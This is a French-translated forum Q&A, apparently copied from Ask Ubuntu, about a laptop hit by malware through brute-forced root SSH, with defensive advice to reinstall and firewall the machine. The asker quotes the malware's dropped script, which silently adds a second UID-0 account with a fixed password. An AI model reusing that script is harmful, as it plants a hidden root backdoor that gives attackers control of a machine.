GNU/Linux >> Tutoriels Linux >  >> Ubuntu

Comment faire face aux logiciels malveillants sur l'ordinateur portable ?

Je suis à peu près certain que mon ordinateur portable Ubuntu 13.10 est infecté par une sorte de logiciel malveillant.

De temps en temps, je trouve un processus /lib/sshd (appartenant à root) en cours d'exécution et consommant beaucoup de CPU. Ce n'est pas le serveur sshd qui exécute /usr/sbin/sshd.

Le binaire a les permissions –wxrw-rwt et il génère et engendre des scripts dans le répertoire /lib. Un récent est nommé 13959730401387633604 et il fait ce qui suit

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

L'utilisateur gusr a été créé indépendamment par le logiciel malveillant, puis le chpasswd se bloque tout en consommant 100 % du processeur.

Jusqu'à présent, j'ai identifié que l'utilisateur gusr a également été ajouté aux fichiers dans /etc/

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Il semble que le logiciel malveillant ait fait des copies de tous ces fichiers avec le suffixe "-". La liste complète des fichiers /etc/ qui ont été modifiés par root est disponible ici.

De plus, le fichier /etc/hosts a été remplacé par this.

Le /lib/sshd commence par s'ajouter à la fin du fichier /etc/init.d/rc.local !

J'ai supprimé l'utilisateur, supprimé les fichiers, supprimé l'arborescence des processus, modifié mes mots de passe et supprimé les clés publiques ssh.

Je suis conscient que je suis fondamentalement foutu et je vais très probablement réinstaller tout le système. Néanmoins, puisque je me connecte à plusieurs autres machines, il serait bon d'essayer au moins de le supprimer et de comprendre comment je l'ai obtenu. Toutes les suggestions sur la façon de procéder seraient appréciées.

Il semble qu'ils soient entrés le 25 mars en forçant brutalement la connexion root. Je ne savais pas que root ssh est activé par défaut dans Ubuntu. Je l'ai désactivé et mis en place denyhosts.

La connexion provenait du 59.188.247.236, quelque part à Hong Kong apparemment.

J'ai reçu l'ordinateur portable d'EmperorLinux et ils ont activé l'accès root. Si vous en avez un et que vous utilisez sshd, méfiez-vous.

Réponse acceptée :

Tout d'abord, retirez cette machine du réseau maintenant !

Deuxièmement, pourquoi avez-vous activé le compte root ? Vous ne devriez vraiment pas activer le compte root à moins d'avoir une très bonne raison de le faire.

Troisièmement, oui, la seule façon d'être sûr que vous êtes propre est de faire une installation propre. Il est également conseillé de recommencer à zéro et de ne pas revenir à une sauvegarde, car vous ne pouvez jamais être sûr quand tout a commencé.

Connexe :Commande pour déterminer l'adresse IP publique ?

Je vous suggère également de configurer un pare-feu lors de votre prochaine installation et de refuser toutes les connexions entrantes :

sudo ufw default deny incoming

puis autorisez ssh avec :

sudo ufw allow ssh

et N'ACTIVEZ PAS le compte root ! Certainement assurez-vous que la connexion root ssh est désactivée.


Ubuntu

  1. Linux – Comment trouver le pilote (module) associé à un périphérique sous Linux ?

  2. Comment synchroniser la racine Gedit avec les préférences de l'utilisateur Gedit ?

  3. Comment installer l'imprimante avec Ubuntu ?

  4. Comment configurer ssh sans mot de passe avec des clés RSA

  5. SSH - Comment inclure la commande -t dans le fichier ~/.ssh/config

Comment changer le mot de passe root sur Ubuntu 20.04

Comment gérer à distance le serveur Ubuntu avec SSH

Comment changer le mot de passe root dans Ubuntu

Comment changer le répertoire racine du domaine primaire avec .htaccess ?

Comment réinitialiser le mot de passe root sur Ubuntu 22.04

Comment désactiver la connexion SSH pour l'utilisateur root sous Linux ?